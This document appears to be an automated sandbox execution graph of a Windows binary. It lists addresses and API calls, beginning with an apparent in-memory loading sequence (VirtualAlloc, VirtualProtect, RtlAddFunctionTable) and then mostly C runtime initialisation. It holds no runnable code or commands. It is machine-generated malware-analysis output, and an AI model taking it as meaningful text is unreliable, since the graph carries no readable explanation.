                                                                      execution_graph 9663 1020000 9664 1020183 9663->9664 9665 102043e VirtualAlloc 9664->9665 9669 1020462 9665->9669 9666 1020a7b 9667 1020531 GetNativeSystemInfo 9667->9666 9668 102056d VirtualAlloc 9667->9668 9673 102058b 9668->9673 9669->9666 9669->9667 9670 1020a00 9670->9666 9671 1020a56 RtlAddFunctionTable 9670->9671 9671->9666 9672 10209d9 VirtualProtect 9672->9673 9673->9670 9673->9672 9674 7ffa526a1ee7 9675 7ffa526a1f13 RtlAllocateHeap 9674->9675 9676 7ffa526a1f3d RtlDeleteBoundaryDescriptor 9675->9676 9677 7ffa526a1f5c 9675->9677 9676->9677 9678 7ffa526a2290 9680 7ffa526a22b6 9678->9680 9679 7ffa526a22f3 9687 7ffa526a22be 9679->9687 9732 7ffa52661230 9679->9732 9680->9679 9680->9687 9690 7ffa526a2154 9680->9690 9684 7ffa526a2335 9685 7ffa526a2154 126 API calls 9684->9685 9684->9687 9685->9687 9686 7ffa52661230 8 API calls 9688 7ffa526a2328 9686->9688 9689 7ffa526a2154 126 API calls 9688->9689 9689->9684 9691 7ffa526a2162 9690->9691 9692 7ffa526a21e1 9690->9692 9737 7ffa526a4110 HeapCreate 9691->9737 9694 7ffa526a221e 9692->9694 9699 7ffa526a21e5 9692->9699 9695 7ffa526a2223 9694->9695 9696 7ffa526a2279 9694->9696 9830 7ffa526a3108 9695->9830 9698 7ffa526a216d 9696->9698 9857 7ffa526a2f50 9696->9857 9698->9679 9699->9698 9703 7ffa526a3a48 46 API calls 9699->9703 9702 7ffa526a2179 _RTC_Initialize 9713 7ffa526a2189 GetCommandLineA 9702->9713 9724 7ffa526a217d 9702->9724 9705 7ffa526a2212 9703->9705 9709 7ffa526a2c94 48 API calls 9705->9709 9707 7ffa526a2243 FlsSetValue 9710 7ffa526a2259 9707->9710 9711 7ffa526a226f 9707->9711 9712 7ffa526a2217 9709->9712 9842 7ffa526a2cbc 9710->9842 9851 7ffa526a3024 9711->9851 9841 7ffa526a415c HeapDestroy 9712->9841 9756 7ffa526a3eec 9713->9756 9835 7ffa526a415c HeapDestroy 9724->9835 9725 7ffa526a21b7 9726 7ffa526a21cb 9725->9726 9809 7ffa526a3aec 9725->9809 9726->9698 9836 7ffa526a3a48 9726->9836 9730 7ffa526a21ab 9794 7ffa526a2c94 9730->9794 9733 7ffa52661249 wcsftime 9732->9733 9734 7ffa52661276 9733->9734 9735 7ffa526a20e0 __initmbctable 8 API calls 9734->9735 9736 7ffa526a203e 9735->9736 9736->9684 9736->9686 9738 7ffa526a4134 HeapSetInformation 9737->9738 9739 7ffa526a2169 9737->9739 9738->9739 9739->9698 9740 7ffa526a2fa0 9739->9740 9863 7ffa526a36f0 9740->9863 9742 7ffa526a2fab 9868 7ffa526a6970 9742->9868 9745 7ffa526a3014 9747 7ffa526a2c94 48 API calls 9745->9747 9746 7ffa526a2fb4 FlsAlloc 9746->9745 9748 7ffa526a2fcc 9746->9748 9750 7ffa526a3019 9747->9750 9749 7ffa526a3108 __wtomb_environ 45 API calls 9748->9749 9751 7ffa526a2fdb 9749->9751 9750->9702 9751->9745 9752 7ffa526a2fe3 FlsSetValue 9751->9752 9752->9745 9753 7ffa526a2ff6 9752->9753 9754 7ffa526a2cbc _errno 45 API calls 9753->9754 9755 7ffa526a3000 GetCurrentThreadId 9754->9755 9755->9750 9757 7ffa526a3f1b GetEnvironmentStringsW 9756->9757 9758 7ffa526a3f4d 9756->9758 9759 7ffa526a3f35 GetLastError 9757->9759 9760 7ffa526a3f29 9757->9760 9758->9760 9761 7ffa526a4010 9758->9761 9759->9758 9763 7ffa526a3f5b GetEnvironmentStringsW 9760->9763 9769 7ffa526a3f70 WideCharToMultiByte 9760->9769 9762 7ffa526a401d GetEnvironmentStrings 9761->9762 9767 7ffa526a219b 9761->9767 9762->9767 9768 7ffa526a402f 9762->9768 9763->9767 9763->9769 9765 7ffa526a3fff 9771 7ffa526a4002 FreeEnvironmentStringsW 9765->9771 9766 7ffa526a3fbe 9875 7ffa526a309c 9766->9875 9781 7ffa526a3758 GetStartupInfoA 9767->9781 9772 7ffa526a309c __setargv 45 API calls 9768->9772 9769->9765 9769->9766 9771->9767 9773 7ffa526a4053 9772->9773 9775 7ffa526a4069 __initmbctable 9773->9775 9776 7ffa526a405b FreeEnvironmentStringsA 9773->9776 9779 7ffa526a4077 FreeEnvironmentStringsA 9775->9779 9776->9767 9777 7ffa526a3fce WideCharToMultiByte 9777->9771 9778 7ffa526a3ff7 9777->9778 9780 7ffa526a3024 free 45 API calls 9778->9780 9779->9767 9780->9765 9782 7ffa526a3108 __wtomb_environ 45 API calls 9781->9782 9789 7ffa526a3795 9782->9789 9783 7ffa526a21a7 9783->9730 9802 7ffa526a3df4 9783->9802 9784 7ffa526a3981 GetStdHandle 9788 7ffa526a395b 9784->9788 9785 7ffa526a3108 __wtomb_environ 45 API calls 9785->9789 9786 7ffa526a39b0 GetFileType 9786->9788 9787 7ffa526a3a10 SetHandleCount 9787->9783 9788->9783 9788->9784 9788->9786 9788->9787 9792 7ffa526a7ee4 _lock InitializeCriticalSectionAndSpinCount 9788->9792 9789->9783 9789->9785 9789->9788 9789->9789 9790 7ffa526a38c4 9789->9790 9790->9783 9790->9788 9791 7ffa526a38f7 GetFileType 9790->9791 9793 7ffa526a7ee4 _lock InitializeCriticalSectionAndSpinCount 9790->9793 9791->9790 9792->9788 9793->9790 9795 7ffa526a2ca3 FlsFree 9794->9795 9796 7ffa526a2cb0 9794->9796 9795->9796 9797 7ffa526a6a2f DeleteCriticalSection 9796->9797 9799 7ffa526a6a4d 9796->9799 9798 7ffa526a3024 free 45 API calls 9797->9798 9798->9796 9800 7ffa526a6a5b DeleteCriticalSection 9799->9800 9801 7ffa526a6a6a 9799->9801 9800->9799 9801->9724 9803 7ffa526a3e0c 9802->9803 9804 7ffa526a3e11 GetModuleFileNameA 9802->9804 10021 7ffa526a4ecc 9803->10021 9806 7ffa526a3e43 __setargv 9804->9806 9807 7ffa526a309c __setargv 45 API calls 9806->9807 9808 7ffa526a3e97 __setargv 9806->9808 9807->9808 9808->9725 9810 7ffa526a3b09 9809->9810 9812 7ffa526a3b0e _tzset 9809->9812 9811 7ffa526a4ecc __initmbctable 83 API calls 9810->9811 9811->9812 9813 7ffa526a3108 __wtomb_environ 45 API calls 9812->9813 9816 7ffa526a21c0 9812->9816 9815 7ffa526a3b4d _tzset 9813->9815 9814 7ffa526a3024 free 45 API calls 9814->9816 9815->9816 9817 7ffa526a3108 __wtomb_environ 45 API calls 9815->9817 9818 7ffa526a3bc6 9815->9818 9819 7ffa526a3c02 9815->9819 9821 7ffa526a7fbc _tzset 45 API calls 9815->9821 9822 7ffa526a3ba2 9815->9822 9816->9726 9824 7ffa526a347c 9816->9824 9817->9815 9818->9814 9820 7ffa526a3024 free 45 API calls 9819->9820 9820->9816 9821->9815 9823 7ffa526a6550 _isindst 6 API calls 9822->9823 9823->9815 9826 7ffa526a3492 _cinit 9824->9826 10425 7ffa526a73f4 9826->10425 9827 7ffa526a34af _initterm_e 9829 7ffa526a34d2 _cinit 9827->9829 10428 7ffa526a73dc 9827->10428 9829->9726 9831 7ffa526a312d 9830->9831 9833 7ffa526a2237 9831->9833 9834 7ffa526a314b Sleep 9831->9834 10445 7ffa526a6cec 9831->10445 9833->9698 9833->9707 9834->9831 9834->9833 9835->9698 9838 7ffa526a3a59 9836->9838 9837 7ffa526a3aa8 9837->9730 9838->9837 9839 7ffa526a3024 free 45 API calls 9838->9839 9840 7ffa526a3a70 DeleteCriticalSection 9838->9840 9839->9838 9840->9838 9841->9698 9843 7ffa526a6ba0 _lock 45 API calls 9842->9843 9844 7ffa526a2d11 9843->9844 10454 7ffa526a6a80 LeaveCriticalSection 9844->10454 9852 7ffa526a3029 HeapFree 9851->9852 9856 7ffa526a3059 realloc 9851->9856 9853 7ffa526a3044 9852->9853 9852->9856 9854 7ffa526a67e0 _errno 43 API calls 9853->9854 9855 7ffa526a3049 GetLastError 9854->9855 9855->9856 9856->9698 9858 7ffa526a2f64 9857->9858 9859 7ffa526a2f88 9857->9859 9860 7ffa526a2f69 FlsGetValue 9858->9860 9861 7ffa526a2f78 FlsSetValue 9858->9861 9859->9698 9860->9861 10455 7ffa526a2e18 9861->10455 9872 7ffa526a2c5c EncodePointer 9863->9872 9865 7ffa526a36fb _initp_misc_winsig 9866 7ffa526a755c EncodePointer 9865->9866 9867 7ffa526a373e EncodePointer 9866->9867 9867->9742 9869 7ffa526a6993 9868->9869 9870 7ffa526a2fb0 9869->9870 9873 7ffa526a7ee4 InitializeCriticalSectionAndSpinCount 9869->9873 9870->9745 9870->9746 9874 7ffa526a7f11 9873->9874 9874->9869 9876 7ffa526a30b8 9875->9876 9878 7ffa526a30f0 9876->9878 9879 7ffa526a30d0 Sleep 9876->9879 9880 7ffa526a6c34 9876->9880 9878->9765 9878->9777 9879->9876 9879->9878 9881 7ffa526a6cc8 realloc 9880->9881 9889 7ffa526a6c4c realloc 9880->9889 9883 7ffa526a67e0 _errno 44 API calls 9881->9883 9882 7ffa526a6c84 RtlAllocateHeap 9884 7ffa526a6cbd 9882->9884 9882->9889 9883->9884 9884->9876 9886 7ffa526a6cad 9939 7ffa526a67e0 9886->9939 9889->9882 9889->9886 9890 7ffa526a6cb2 9889->9890 9892 7ffa526a6c64 9889->9892 9893 7ffa526a67e0 _errno 44 API calls 9890->9893 9892->9882 9894 7ffa526a7160 9892->9894 9903 7ffa526a6f0c 9892->9903 9936 7ffa526a334c 9892->9936 9893->9884 9942 7ffa526ad2ac 9894->9942 9897 7ffa526ad2ac _FF_MSGBANNER 45 API calls 9902 7ffa526a717d 9897->9902 9898 7ffa526a6f0c _FF_MSGBANNER 45 API calls 9899 7ffa526a7194 9898->9899 9900 7ffa526a6f0c _FF_MSGBANNER 45 API calls 9899->9900 9901 7ffa526a719e 9900->9901 9901->9892 9902->9898 9902->9901 9904 7ffa526a6f2f 9903->9904 9905 7ffa526a70d4 9904->9905 9906 7ffa526ad2ac _FF_MSGBANNER 42 API calls 9904->9906 9905->9892 9907 7ffa526a6f51 9906->9907 9908 7ffa526a70d6 GetStdHandle 9907->9908 9909 7ffa526ad2ac _FF_MSGBANNER 42 API calls 9907->9909 9908->9905 9910 7ffa526a70e9 _tzset 9908->9910 9911 7ffa526a6f64 9909->9911 9910->9905 9913 7ffa526a70ff WriteFile 9910->9913 9911->9908 9912 7ffa526a6f75 9911->9912 9912->9905 9961 7ffa526a7fbc 9912->9961 9913->9905 9916 7ffa526a6fb9 GetModuleFileNameA 9917 7ffa526a6fd9 9916->9917 9922 7ffa526a700a _tzset 9916->9922 9919 7ffa526a7fbc _tzset 42 API calls 9917->9919 9918 7ffa526a6550 _isindst 6 API calls 9918->9916 9920 7ffa526a6ff1 9919->9920 9920->9922 9924 7ffa526a6550 _isindst 6 API calls 9920->9924 9921 7ffa526a7065 9979 7ffa526abdf4 9921->9979 9922->9921 9970 7ffa526abf14 9922->9970 9924->9922 9926 7ffa526a7090 9929 7ffa526abdf4 _FF_MSGBANNER 42 API calls 9926->9929 9928 7ffa526a6550 _isindst 6 API calls 9928->9926 9931 7ffa526a70a6 9929->9931 9932 7ffa526a70bf 9931->9932 9934 7ffa526a6550 _isindst 6 API calls 9931->9934 9988 7ffa526ad0b8 9932->9988 9933 7ffa526a6550 _isindst 6 API calls 9933->9921 9934->9932 10006 7ffa526a3310 GetModuleHandleW 9936->10006 10009 7ffa526a2d70 GetLastError FlsGetValue 9939->10009 9941 7ffa526a67e9 9941->9890 9943 7ffa526ad2b4 9942->9943 9944 7ffa526a67e0 _errno 45 API calls 9943->9944 9945 7ffa526a716e 9943->9945 9946 7ffa526ad2d9 9944->9946 9945->9897 9945->9902 9948 7ffa526a66d8 DecodePointer 9946->9948 9949 7ffa526a6723 _invalid_parameter_noinfo 9948->9949 9950 7ffa526a6709 9948->9950 9952 7ffa526a6550 9949->9952 9950->9945 9959 7ffa526a87a0 9952->9959 9955 7ffa526a65ad 9956 7ffa526a660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9955->9956 9957 7ffa526a6658 GetCurrentProcess TerminateProcess 9956->9957 9958 7ffa526a664c _invalid_parameter_noinfo 9956->9958 9957->9950 9958->9957 9960 7ffa526a6570 RtlCaptureContext 9959->9960 9960->9955 9962 7ffa526a7fd1 9961->9962 9963 7ffa526a7fc7 9961->9963 9964 7ffa526a67e0 _errno 45 API calls 9962->9964 9963->9962 9965 7ffa526a7ffd 9963->9965 9966 7ffa526a7fd9 9964->9966 9968 7ffa526a6fa0 9965->9968 9969 7ffa526a67e0 _errno 45 API calls 9965->9969 9967 7ffa526a66d8 _invalid_parameter_noinfo 7 API calls 9966->9967 9967->9968 9968->9916 9968->9918 9969->9966 9973 7ffa526abf22 9970->9973 9971 7ffa526abf27 9972 7ffa526a67e0 _errno 45 API calls 9971->9972 9974 7ffa526a704c 9971->9974 9978 7ffa526abf51 9972->9978 9973->9971 9973->9974 9976 7ffa526abf75 9973->9976 9974->9921 9974->9933 9975 7ffa526a66d8 _invalid_parameter_noinfo 7 API calls 9975->9974 9976->9974 9977 7ffa526a67e0 _errno 45 API calls 9976->9977 9977->9978 9978->9975 9980 7ffa526abe0c 9979->9980 9983 7ffa526abe02 9979->9983 9981 7ffa526a67e0 _errno 45 API calls 9980->9981 9982 7ffa526abe14 9981->9982 9985 7ffa526a66d8 _invalid_parameter_noinfo 7 API calls 9982->9985 9983->9980 9984 7ffa526abe50 9983->9984 9986 7ffa526a7077 9984->9986 9987 7ffa526a67e0 _errno 45 API calls 9984->9987 9985->9986 9986->9926 9986->9928 9987->9982 10005 7ffa526a2c5c EncodePointer 9988->10005 10007 7ffa526a333f ExitProcess 10006->10007 10008 7ffa526a332a GetProcAddress 10006->10008 10008->10007 10010 7ffa526a2d96 10009->10010 10011 7ffa526a2dde SetLastError 10009->10011 10012 7ffa526a3108 __wtomb_environ 40 API calls 10010->10012 10011->9941 10013 7ffa526a2da3 10012->10013 10013->10011 10014 7ffa526a2dab FlsSetValue 10013->10014 10015 7ffa526a2dd7 10014->10015 10016 7ffa526a2dc1 10014->10016 10018 7ffa526a3024 free 40 API calls 10015->10018 10017 7ffa526a2cbc _errno 40 API calls 10016->10017 10019 7ffa526a2dc8 GetCurrentThreadId 10017->10019 10020 7ffa526a2ddc 10018->10020 10019->10011 10020->10011 10022 7ffa526a4ed9 10021->10022 10023 7ffa526a4ee3 10021->10023 10025 7ffa526a4cd4 10022->10025 10023->9804 10049 7ffa526a2df4 10025->10049 10032 7ffa526a309c __setargv 45 API calls 10033 7ffa526a4d24 __initmbctable 10032->10033 10042 7ffa526a4e81 10033->10042 10072 7ffa526a4a0c 10033->10072 10036 7ffa526a4e83 10038 7ffa526a4e9c 10036->10038 10041 7ffa526a3024 free 45 API calls 10036->10041 10036->10042 10037 7ffa526a4d5f 10040 7ffa526a3024 free 45 API calls 10037->10040 10043 7ffa526a4d84 10037->10043 10039 7ffa526a67e0 _errno 45 API calls 10038->10039 10039->10042 10040->10043 10041->10038 10042->10023 10043->10042 10082 7ffa526a6ba0 10043->10082 10050 7ffa526a2d70 _errno 45 API calls 10049->10050 10051 7ffa526a2dff 10050->10051 10052 7ffa526a2e0f 10051->10052 10088 7ffa526a32e0 10051->10088 10054 7ffa526a48c0 10052->10054 10055 7ffa526a2df4 _getptd 45 API calls 10054->10055 10056 7ffa526a48cf 10055->10056 10057 7ffa526a6ba0 _lock 45 API calls 10056->10057 10058 7ffa526a48ea 10056->10058 10063 7ffa526a48fd 10057->10063 10059 7ffa526a496e 10058->10059 10062 7ffa526a32e0 _lock 45 API calls 10058->10062 10065 7ffa526a497c 10059->10065 10060 7ffa526a4934 10093 7ffa526a6a80 LeaveCriticalSection 10060->10093 10062->10059 10063->10060 10064 7ffa526a3024 free 45 API calls 10063->10064 10064->10060 10094 7ffa526a2534 10065->10094 10068 7ffa526a499c GetOEMCP 10071 7ffa526a49ac 10068->10071 10069 7ffa526a49c1 10070 7ffa526a49c6 GetACP 10069->10070 10069->10071 10070->10071 10071->10032 10071->10042 10073 7ffa526a497c __initmbctable 47 API calls 10072->10073 10074 7ffa526a4a33 10073->10074 10075 7ffa526a4a3b __initmbctable 10074->10075 10076 7ffa526a4a8c IsValidCodePage 10074->10076 10081 7ffa526a4ab2 __initmbctable 10074->10081 10271 7ffa526a20e0 10075->10271 10076->10075 10078 7ffa526a4a9d GetCPInfo 10076->10078 10078->10075 10078->10081 10079 7ffa526a4c6f 10079->10036 10079->10037 10261 7ffa526a46dc GetCPInfo 10081->10261 10083 7ffa526a6bcf EnterCriticalSection 10082->10083 10084 7ffa526a6bbe 10082->10084 10399 7ffa526a6ab8 10084->10399 10087 7ffa526a32e0 _lock 44 API calls 10087->10083 10089 7ffa526a7160 _FF_MSGBANNER 44 API calls 10088->10089 10090 7ffa526a32ed 10089->10090 10091 7ffa526a6f0c _FF_MSGBANNER 44 API calls 10090->10091 10092 7ffa526a32f4 DecodePointer 10091->10092 10095 7ffa526a254a 10094->10095 10099 7ffa526a25ae 10094->10099 10096 7ffa526a2df4 _getptd 45 API calls 10095->10096 10097 7ffa526a254f 10096->10097 10098 7ffa526a2587 10097->10098 10102 7ffa526a524c 10097->10102 10098->10099 10101 7ffa526a48c0 __initmbctable 45 API calls 10098->10101 10099->10068 10099->10069 10101->10099 10103 7ffa526a2df4 _getptd 45 API calls 10102->10103 10104 7ffa526a5257 10103->10104 10105 7ffa526a5280 10104->10105 10107 7ffa526a5272 10104->10107 10106 7ffa526a6ba0 _lock 45 API calls 10105->10106 10108 7ffa526a528a 10106->10108 10109 7ffa526a2df4 _getptd 45 API calls 10107->10109 10116 7ffa526a51f4 10108->10116 10110 7ffa526a5277 10109->10110 10114 7ffa526a52b8 10110->10114 10115 7ffa526a32e0 _lock 45 API calls 10110->10115 10114->10098 10115->10114 10117 7ffa526a523e 10116->10117 10118 7ffa526a5202 ___lc_codepage_func 10116->10118 10120 7ffa526a6a80 LeaveCriticalSection 10117->10120 10118->10117 10121 7ffa526a4f04 10118->10121 10122 7ffa526a4f9b 10121->10122 10124 7ffa526a4f22 10121->10124 10123 7ffa526a4fee 10122->10123 10125 7ffa526a3024 free 45 API calls 10122->10125 10132 7ffa526a501b 10123->10132 10173 7ffa526a98a4 10123->10173 10124->10122 10128 7ffa526a4f61 10124->10128 10137 7ffa526a3024 free 45 API calls 10124->10137 10126 7ffa526a4fbf 10125->10126 10129 7ffa526a3024 free 45 API calls 10126->10129 10130 7ffa526a4f83 10128->10130 10141 7ffa526a3024 free 45 API calls 10128->10141 10133 7ffa526a4fd3 10129->10133 10135 7ffa526a3024 free 45 API calls 10130->10135 10134 7ffa526a5067 10132->10134 10139 7ffa526a3024 45 API calls free 10132->10139 10140 7ffa526a3024 free 45 API calls 10133->10140 10142 7ffa526a4f8f 10135->10142 10136 7ffa526a3024 free 45 API calls 10136->10132 10138 7ffa526a4f55 10137->10138 10149 7ffa526a9df8 10138->10149 10139->10132 10144 7ffa526a4fe2 10140->10144 10145 7ffa526a4f77 10141->10145 10146 7ffa526a3024 free 45 API calls 10142->10146 10147 7ffa526a3024 free 45 API calls 10144->10147 10165 7ffa526a9b68 10145->10165 10146->10122 10147->10123 10150 7ffa526a9e01 10149->10150 10163 7ffa526a9e87 10149->10163 10151 7ffa526a9e1b 10150->10151 10152 7ffa526a3024 free 45 API calls 10150->10152 10153 7ffa526a9e2d 10151->10153 10154 7ffa526a3024 free 45 API calls 10151->10154 10152->10151 10155 7ffa526a9e3f 10153->10155 10156 7ffa526a3024 free 45 API calls 10153->10156 10154->10153 10158 7ffa526a9e51 10155->10158 10159 7ffa526a3024 free 45 API calls 10155->10159 10156->10155 10157 7ffa526a9e63 10161 7ffa526a9e75 10157->10161 10162 7ffa526a3024 free 45 API calls 10157->10162 10158->10157 10160 7ffa526a3024 free 45 API calls 10158->10160 10159->10158 10160->10157 10161->10163 10164 7ffa526a3024 free 45 API calls 10161->10164 10162->10161 10163->10128 10164->10163 10166 7ffa526a9b6d 10165->10166 10171 7ffa526a9baa 10165->10171 10167 7ffa526a9b86 10166->10167 10168 7ffa526a3024 free 45 API calls 10166->10168 10169 7ffa526a9b98 10167->10169 10170 7ffa526a3024 free 45 API calls 10167->10170 10168->10167 10169->10171 10172 7ffa526a3024 free 45 API calls 10169->10172 10170->10169 10171->10130 10172->10171 10174 7ffa526a98ad 10173->10174 10260 7ffa526a500f 10173->10260 10175 7ffa526a3024 free 45 API calls 10174->10175 10176 7ffa526a98be 10175->10176 10177 7ffa526a3024 free 45 API calls 10176->10177 10178 7ffa526a98c7 10177->10178 10179 7ffa526a3024 free 45 API calls 10178->10179 10180 7ffa526a98d0 10179->10180 10181 7ffa526a3024 free 45 API calls 10180->10181 10182 7ffa526a98d9 10181->10182 10183 7ffa526a3024 free 45 API calls 10182->10183 10184 7ffa526a98e2 10183->10184 10185 7ffa526a3024 free 45 API calls 10184->10185 10186 7ffa526a98eb 10185->10186 10187 7ffa526a3024 free 45 API calls 10186->10187 10188 7ffa526a98f3 10187->10188 10189 7ffa526a3024 free 45 API calls 10188->10189 10190 7ffa526a98fc 10189->10190 10191 7ffa526a3024 free 45 API calls 10190->10191 10192 7ffa526a9905 10191->10192 10193 7ffa526a3024 free 45 API calls 10192->10193 10194 7ffa526a990e 10193->10194 10195 7ffa526a3024 free 45 API calls 10194->10195 10196 7ffa526a9917 10195->10196 10197 7ffa526a3024 free 45 API calls 10196->10197 10198 7ffa526a9920 10197->10198 10199 7ffa526a3024 free 45 API calls 10198->10199 10200 7ffa526a9929 10199->10200 10201 7ffa526a3024 free 45 API calls 10200->10201 10202 7ffa526a9932 10201->10202 10203 7ffa526a3024 free 45 API calls 10202->10203 10204 7ffa526a993b 10203->10204 10205 7ffa526a3024 free 45 API calls 10204->10205 10206 7ffa526a9944 10205->10206 10207 7ffa526a3024 free 45 API calls 10206->10207 10208 7ffa526a9950 10207->10208 10209 7ffa526a3024 free 45 API calls 10208->10209 10210 7ffa526a995c 10209->10210 10211 7ffa526a3024 free 45 API calls 10210->10211 10212 7ffa526a9968 10211->10212 10213 7ffa526a3024 free 45 API calls 10212->10213 10214 7ffa526a9974 10213->10214 10215 7ffa526a3024 free 45 API calls 10214->10215 10216 7ffa526a9980 10215->10216 10217 7ffa526a3024 free 45 API calls 10216->10217 10218 7ffa526a998c 10217->10218 10219 7ffa526a3024 free 45 API calls 10218->10219 10220 7ffa526a9998 10219->10220 10221 7ffa526a3024 free 45 API calls 10220->10221 10222 7ffa526a99a4 10221->10222 10223 7ffa526a3024 free 45 API calls 10222->10223 10224 7ffa526a99b0 10223->10224 10225 7ffa526a3024 free 45 API calls 10224->10225 10226 7ffa526a99bc 10225->10226 10227 7ffa526a3024 free 45 API calls 10226->10227 10228 7ffa526a99c8 10227->10228 10229 7ffa526a3024 free 45 API calls 10228->10229 10230 7ffa526a99d4 10229->10230 10231 7ffa526a3024 free 45 API calls 10230->10231 10232 7ffa526a99e0 10231->10232 10233 7ffa526a3024 free 45 API calls 10232->10233 10234 7ffa526a99ec 10233->10234 10235 7ffa526a3024 free 45 API calls 10234->10235 10236 7ffa526a99f8 10235->10236 10237 7ffa526a3024 free 45 API calls 10236->10237 10238 7ffa526a9a04 10237->10238 10239 7ffa526a3024 free 45 API calls 10238->10239 10240 7ffa526a9a10 10239->10240 10241 7ffa526a3024 free 45 API calls 10240->10241 10242 7ffa526a9a1c 10241->10242 10243 7ffa526a3024 free 45 API calls 10242->10243 10244 7ffa526a9a28 10243->10244 10245 7ffa526a3024 free 45 API calls 10244->10245 10246 7ffa526a9a34 10245->10246 10247 7ffa526a3024 free 45 API calls 10246->10247 10248 7ffa526a9a40 10247->10248 10249 7ffa526a3024 free 45 API calls 10248->10249 10250 7ffa526a9a4c 10249->10250 10251 7ffa526a3024 free 45 API calls 10250->10251 10252 7ffa526a9a58 10251->10252 10253 7ffa526a3024 free 45 API calls 10252->10253 10254 7ffa526a9a64 10253->10254 10255 7ffa526a3024 free 45 API calls 10254->10255 10256 7ffa526a9a70 10255->10256 10257 7ffa526a3024 free 45 API calls 10256->10257 10258 7ffa526a9a7c 10257->10258 10259 7ffa526a3024 free 45 API calls 10258->10259 10259->10260 10260->10136 10262 7ffa526a480a 10261->10262 10263 7ffa526a471e __initmbctable 10261->10263 10266 7ffa526a20e0 __initmbctable 8 API calls 10262->10266 10282 7ffa526a91a0 10263->10282 10268 7ffa526a48aa 10266->10268 10268->10075 10270 7ffa526a8e9c __initmbctable 78 API calls 10270->10262 10272 7ffa526a20e9 10271->10272 10273 7ffa526a20f4 10272->10273 10274 7ffa526a23e8 RtlCaptureContext RtlLookupFunctionEntry 10272->10274 10273->10079 10275 7ffa526a246d 10274->10275 10276 7ffa526a242c RtlVirtualUnwind 10274->10276 10277 7ffa526a248f IsDebuggerPresent 10275->10277 10276->10277 10398 7ffa526a460c 10277->10398 10279 7ffa526a24ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10280 7ffa526a2516 GetCurrentProcess TerminateProcess 10279->10280 10281 7ffa526a250c _invalid_parameter_noinfo 10279->10281 10280->10079 10281->10280 10283 7ffa526a2534 wcsftime 45 API calls 10282->10283 10284 7ffa526a91c4 10283->10284 10292 7ffa526a8f34 10284->10292 10287 7ffa526a8e9c 10288 7ffa526a2534 wcsftime 45 API calls 10287->10288 10289 7ffa526a8ec0 10288->10289 10351 7ffa526a895c 10289->10351 10293 7ffa526a8f84 GetStringTypeW 10292->10293 10294 7ffa526a8fc1 10292->10294 10296 7ffa526a8fa6 GetLastError 10293->10296 10297 7ffa526a8f9e 10293->10297 10295 7ffa526a90f0 10294->10295 10294->10297 10316 7ffa526ae1e8 GetLocaleInfoA 10295->10316 10296->10294 10298 7ffa526a8fea MultiByteToWideChar 10297->10298 10307 7ffa526a90e9 10297->10307 10304 7ffa526a9018 10298->10304 10298->10307 10300 7ffa526a20e0 __initmbctable 8 API calls 10302 7ffa526a47a1 10300->10302 10302->10287 10303 7ffa526a914b GetStringTypeA 10303->10307 10308 7ffa526a916e 10303->10308 10305 7ffa526a6c34 realloc 45 API calls 10304->10305 10311 7ffa526a903d __initmbctable wcsftime 10304->10311 10305->10311 10307->10300 10312 7ffa526a3024 free 45 API calls 10308->10312 10309 7ffa526a90a4 MultiByteToWideChar 10313 7ffa526a90c6 GetStringTypeW 10309->10313 10314 7ffa526a90db 10309->10314 10311->10307 10311->10309 10312->10307 10313->10314 10314->10307 10315 7ffa526a3024 free 45 API calls 10314->10315 10315->10307 10317 7ffa526ae21a 10316->10317 10318 7ffa526ae21f 10316->10318 10320 7ffa526a20e0 __initmbctable 8 API calls 10317->10320 10347 7ffa526a2100 10318->10347 10321 7ffa526a911a 10320->10321 10321->10303 10321->10307 10322 7ffa526ae23c 10321->10322 10323 7ffa526ae366 10322->10323 10324 7ffa526ae28e GetCPInfo 10322->10324 10327 7ffa526a20e0 __initmbctable 8 API calls 10323->10327 10325 7ffa526ae2a0 10324->10325 10326 7ffa526ae33f MultiByteToWideChar 10324->10326 10325->10326 10328 7ffa526ae2aa GetCPInfo 10325->10328 10326->10323 10331 7ffa526ae2c5 _tzset 10326->10331 10329 7ffa526a9140 10327->10329 10328->10326 10330 7ffa526ae2bf 10328->10330 10329->10303 10329->10307 10330->10326 10330->10331 10332 7ffa526a6c34 realloc 45 API calls 10331->10332 10336 7ffa526ae301 __initmbctable wcsftime 10331->10336 10332->10336 10333 7ffa526ae39d MultiByteToWideChar 10334 7ffa526ae3c7 10333->10334 10335 7ffa526ae3ff 10333->10335 10337 7ffa526ae407 10334->10337 10338 7ffa526ae3cc WideCharToMultiByte 10334->10338 10335->10323 10339 7ffa526a3024 free 45 API calls 10335->10339 10336->10323 10336->10333 10340 7ffa526ae439 10337->10340 10341 7ffa526ae40d WideCharToMultiByte 10337->10341 10338->10335 10339->10323 10342 7ffa526a3108 __wtomb_environ 45 API calls 10340->10342 10341->10335 10341->10340 10343 7ffa526ae446 10342->10343 10343->10335 10344 7ffa526ae44e WideCharToMultiByte 10343->10344 10344->10335 10345 7ffa526ae477 10344->10345 10346 7ffa526a3024 free 45 API calls 10345->10346 10346->10335 10348 7ffa526a287c 10347->10348 10349 7ffa526a25f8 _wcstoui64_l 67 API calls 10348->10349 10350 7ffa526a28a7 10349->10350 10350->10317 10352 7ffa526a89b4 LCMapStringW 10351->10352 10356 7ffa526a89d8 10351->10356 10353 7ffa526a89e4 GetLastError 10352->10353 10352->10356 10353->10356 10354 7ffa526a8ca6 10359 7ffa526ae1e8 _wcstoui64 67 API calls 10354->10359 10355 7ffa526a8a53 10357 7ffa526a8c9f 10355->10357 10358 7ffa526a8a71 MultiByteToWideChar 10355->10358 10356->10354 10356->10355 10360 7ffa526a20e0 __initmbctable 8 API calls 10357->10360 10358->10357 10369 7ffa526a8aa0 10358->10369 10361 7ffa526a8cd4 10359->10361 10362 7ffa526a47d4 10360->10362 10361->10357 10363 7ffa526a8cf3 10361->10363 10364 7ffa526a8e2f LCMapStringA 10361->10364 10362->10270 10366 7ffa526ae23c _wcstoui64 60 API calls 10363->10366 10375 7ffa526a8d3b 10364->10375 10365 7ffa526a8b1c MultiByteToWideChar 10367 7ffa526a8b46 LCMapStringW 10365->10367 10368 7ffa526a8c91 10365->10368 10370 7ffa526a8d0b 10366->10370 10367->10368 10371 7ffa526a8b70 10367->10371 10368->10357 10377 7ffa526a3024 free 45 API calls 10368->10377 10372 7ffa526a6c34 realloc 45 API calls 10369->10372 10373 7ffa526a8ad1 wcsftime 10369->10373 10370->10357 10374 7ffa526a8d13 LCMapStringA 10370->10374 10378 7ffa526a8bb6 10371->10378 10379 7ffa526a8b7b 